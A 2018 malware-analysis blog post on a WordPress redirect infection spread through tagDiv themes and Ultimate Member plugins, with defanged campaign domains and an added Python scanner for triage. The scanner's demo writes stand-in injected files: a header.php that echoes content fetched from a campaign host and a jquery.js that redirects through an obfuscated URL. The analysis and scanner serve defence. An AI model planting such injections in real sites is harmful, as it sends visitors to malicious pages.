30 Aug, 2018

Malware Analysis - Infection Injected via the Security Vulnerability of TagDiv Themes and UltimateMember Plugins

If you are a WordPress user, or simply follow security news, you have probably already heard about the recent attacks on websites running vulnerable tagDiv themes and Ultimate Member plugins. This post is a deeper dive into the malware and an analysis of its redirection flow. For background and the original disclosures we recommend the posts by Sucuri and InMotion Hosting.
Malicious Redirects - Step by Step
The files targeted by this infection are jQuery.js and multiple *.php files containing a <head> tag in the themes directory. Let's follow the traffic direction system (TDS) implemented by this malware from the injection point to the final landing page.
Malware Infection in the PHP files:
[code listing not reproduced: shown as an image in the original post]
Malware Infection in the jQuery files:
[code listing not reproduced: shown as an image in the original post]
The malware planted inside jQuery.js has the same goal: load malicious content from src[.]eeduelements[.]com.
Original (encoded) injection:
[code listing not reproduced: shown as an image in the original post]
Decoded jQuery injection:
[code listing not reproduced: shown as an image in the original post]
Decoding the PHP malware with https://malwaredecoder.com/ reveals the following behaviour.
The injected malware performs an HTTP GET request to "https[:]//src[.]eeduelements[.]com/get[.]php", which returns the URL https[:]//polonofiex[.]ga/sim[.]js. An HTTP GET to that URL using the wget utility returns a JavaScript payload obfuscated with String.fromCharCode().
Decoding String.fromCharCode():
[code listing not reproduced: shown as an image in the original post]
The t1 variable is set to "http[:]//murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub", which in turn redirects to either tuniaf[.]com or valusc[.]com.
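The two analysis steps above, locating the targeted files (jQuery.js and theme PHP files with a <head> tag) and unwrapping the String.fromCharCode() obfuscation to recover the t1 redirect URL, can be automated for triage. The script below is an added example, not code from the original post, Sucuri or InMotion Hosting. It assumes the campaign domains named in this post as indicators; the theme tree it scans is constructed inline, because the real injection bodies were only shown as images, so the header.php and jquery.js stand-ins mirror the described behaviour (a server-side fetch of get.php, a fromCharCode-hidden t1 URL) rather than the exact injected code.

```python
"""Triage scanner for the redirect infection described above.

Added example (not code from the original post, Sucuri or InMotion Hosting).
It walks a WordPress themes directory, examines the two file classes the post
names (jQuery bundles and theme *.php files carrying a <head> tag), rewrites
any String.fromCharCode(...) call into the string it builds so obfuscated URLs
such as the t1 value become searchable, and reports matches against the
campaign's domains. The theme tree it runs on is constructed here.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterator, List

# Indicators taken from the post, written without the [.] defanging.
IOC_DOMAINS = (
    "src.eeduelements.com",
    "polonofiex.ga",
    "murieh.space",
    "tuniaf.com",
    "valusc.com",
)
# The t1 value quoted in the post (defanging removed).
T1_URL = "http://murieh.space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub"

# String.fromCharCode(104, 0x74, ...) with comma-separated decimal or hex arguments.
_NUM = r"(?:0x[0-9a-fA-F]+|\d+)"
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\s*\(\s*(" + _NUM + r"(?:\s*,\s*" + _NUM + r")*)\s*\)"
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_fromcharcode(js: str) -> str:
    """Replace every String.fromCharCode(n, n, ...) call with an equivalent quoted literal."""
    def _sub(match) -> str:
        chars = []
        for tok in re.findall(r"0x[0-9a-fA-F]+|\d+", match.group(1)):
            chars.append(chr(int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)))
        return json.dumps("".join(chars))  # JSON string syntax is valid JavaScript
    return FROMCHARCODE_RE.sub(_sub, js)


def candidate_files(root: Path) -> Iterator[Path]:
    """Yield the files this campaign targets: jQuery bundles and theme PHP files with <head>."""
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        name = path.name.lower()
        if name.endswith(".js") and "jquery" in name:
            yield path
        elif name.endswith(".php") and "<head" in path.read_text(errors="replace").lower():
            yield path


def scan_file(path: Path) -> Dict[str, object]:
    """Decode fromCharCode blobs, then look for campaign domains and any URLs."""
    decoded = decode_fromcharcode(path.read_text(errors="replace"))
    return {
        "path": str(path),
        "iocs": sorted(d for d in IOC_DOMAINS if d in decoded),
        "decoded_urls": sorted(set(URL_RE.findall(decoded))),
    }


def scan_themes(root: Path) -> List[Dict[str, object]]:
    """Return only files that reference at least one campaign domain."""
    return [r for r in map(scan_file, candidate_files(root)) if r["iocs"]]


def fromcharcode_literal(text: str) -> str:
    """Obfuscate text the way sim.js did; used only to build the constructed sample."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"


def build_sample_theme(root: Path) -> None:
    """Constructed theme tree: one clean file, one injected header.php, one injected jquery.js."""
    theme = root / "Newspaper"
    (theme / "js").mkdir(parents=True)
    (theme / "footer.php").write_text("<?php wp_footer(); ?></body></html>\n")
    # Stand-in for the encoded PHP injection: fetch get.php server-side (constructed).
    (theme / "header.php").write_text(
        "<!DOCTYPE html><html><head>\n"
        "<?php echo @file_get_contents('https://src.eeduelements.com/get.php'); ?>\n"
        "<?php wp_head(); ?></head>\n"
    )
    # Stand-in for the jQuery injection: the t1 redirect hidden behind fromCharCode (constructed).
    (theme / "js" / "jquery.js").write_text(
        "/*! jQuery v1.12.4 */\n"
        "var t1=" + fromcharcode_literal(T1_URL) + ";\n"
        "window.location=t1;\n"
    )


def run_demo() -> List[Dict[str, object]]:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wp-content" / "themes"
        build_sample_theme(root)
        return scan_themes(root)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding["path"])
        print("  IOC domains :", ", ".join(finding["iocs"]))
        print("  decoded URLs:", ", ".join(finding["decoded_urls"]))
```

Point `scan_themes()` at a real wp-content/themes directory to triage a site; the decoded URL list is what you feed into the next hop of the TDS (here the get.php and murieh.space URLs). The decoder only handles the plain `String.fromCharCode(...)` form with numeric arguments; variants such as `String['fromCharCode']`, arithmetic in the arguments, or `unescape()`/`eval()` wrappers need an additional pass, so treat a clean scan as "nothing found by this pattern" rather than "clean".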
Simulating access to murieh[.]space:
[code listing not reproduced: shown as an image in the original post]
Protect Yourself and Your Website
Make sure all your themes and plugins are up to date. Harden your website and your server account; see our post on WordPress Hardening. We are not listing cleanup steps here because the infection varies depending on the malicious campaign's settings. If you need help removing this or any other malware, and, more importantly, with protecting your website from new attacks like the one described above, choose one of our anti-malware plans.